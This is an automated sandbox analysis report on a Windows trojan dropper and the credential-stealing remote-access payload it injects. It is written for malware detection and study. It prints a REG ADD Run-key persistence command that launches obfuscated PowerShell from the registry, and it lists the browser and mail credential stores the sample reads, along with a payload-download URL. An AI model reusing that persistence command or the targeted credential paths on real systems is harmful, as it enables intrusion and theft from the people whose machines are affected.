        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe API coverage: 9.9 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3096 Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2300 Thread sleep time: -714000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe TID: 2300 Thread sleep time: -28761000s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe Code function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\intercessionate\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe API call chain: ExitProcess graph end node graph_0-3874
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe API call chain: ExitProcess graph end node graph_0-3870
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe API call chain: ExitProcess graph end node graph_13-33887
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Code function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 1730000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe base: 19FFF4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe Process created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dProgram Manager
        Source: Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
        Source: Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3492428807.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagersB(|
        Source: Vaccinerende.exe, 00000008.00000003.3499440809.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3498161571.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cProgram Manager
        Source: Vaccinerende.exe, 00000008.00000003.3491517945.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3478586940.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3499440809.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HProgram ManagerOP
        Source: Vaccinerende.exe, 00000008.00000003.3463202609.00000000068FA000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467265912.00000000068FC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000008.00000003.3467348122.00000000068FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager`B?|
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: ESMTPPassword 13_2_004033F0
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 13_2_00402DB3
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 13_2_00402DB3
        Source: Yara match | File source: Process Memory Space: Vaccinerende.exe PID: 6044, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: Vaccinerende.exe PID: 2140, type: MEMORYSTR

        Remote Access Functionality

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | 11 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 212 Process Injection | 2 Software Packing | 1 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | NTDS | 119 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Modify Registry | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 12 Application Layer Protocol | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        [Behavior graph (image not preserved): Behavior Graph ID: 1522631, Sample: SecuriteInfo.com.Win32.Inje..., Startdate: 30/09/2024, Architecture: WINDOWS, Score: 100]

        Source | Detection | Scanner | Label | Link
        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | 24% | ReversingLabs | Win32.Trojan.Leonem |
        SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | 33% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | 24% | ReversingLabs | Win32.Trojan.Leonem |
        C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | 33% | Virustotal | | Browse

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        geoplugin.net | 0% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
        http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
        https://contoso.com/ | 0% | URL Reputation | safe |
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
        https://contoso.com/License | 0% | URL Reputation | safe |
        https://contoso.com/Icon | 0% | URL Reputation | safe |
        http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
        http://www.imvu.com | 0% | Virustotal | | Browse
        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
        https://www.google.com | 0% | Virustotal | | Browse
        https://www.google.com/accounts/servicelogin | 0% | Virustotal | | Browse
        https://login.yahoo.com/config/login | 0% | Virustotal | | Browse
        http://www.nirsoft.net | 0% | Virustotal | | Browse
        http://www.nirsoft.net/ | 0% | Virustotal | | Browse
        http://www.ebuddy.com | 0% | Virustotal | | Browse
        https://github.com/Pester/Pester | 1% | Virustotal | | Browse
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        geoplugin.net | 178.237.33.50 | true | false | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        http://geoplugin.net/json.gp | false | URL Reputation: safe; URL Reputation: safe | unknown
        http://192.3.220.22/hFXELFSwRHRwqbE214.bin | false | | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.google.com | Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
        http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.imvu.comr | Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://www.imvu.comta | Vaccinerende.exe, 0000000E.00000003.3385540576.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000E.00000003.3385506073.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://aka.ms/pscore6lBfq | powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://contoso.com/ | powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/License | powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.imvu.com | Vaccinerende.exe, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://contoso.com/Icon | powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://www.google.com/accounts/servicelogin | Vaccinerende.exe | false | | unknown
        https://login.yahoo.com/config/login | Vaccinerende.exe | false | | unknown
        http://www.nirsoft.net | Vaccinerende.exe, 0000000C.00000002.3452099988.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455058048.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | | unknown
        http://nsis.sf.net/NSIS_ErrorError | SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Vaccinerende.exe.1.dr | false | URL Reputation: safe | unknown
        http://www.nirsoft.net/ | Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
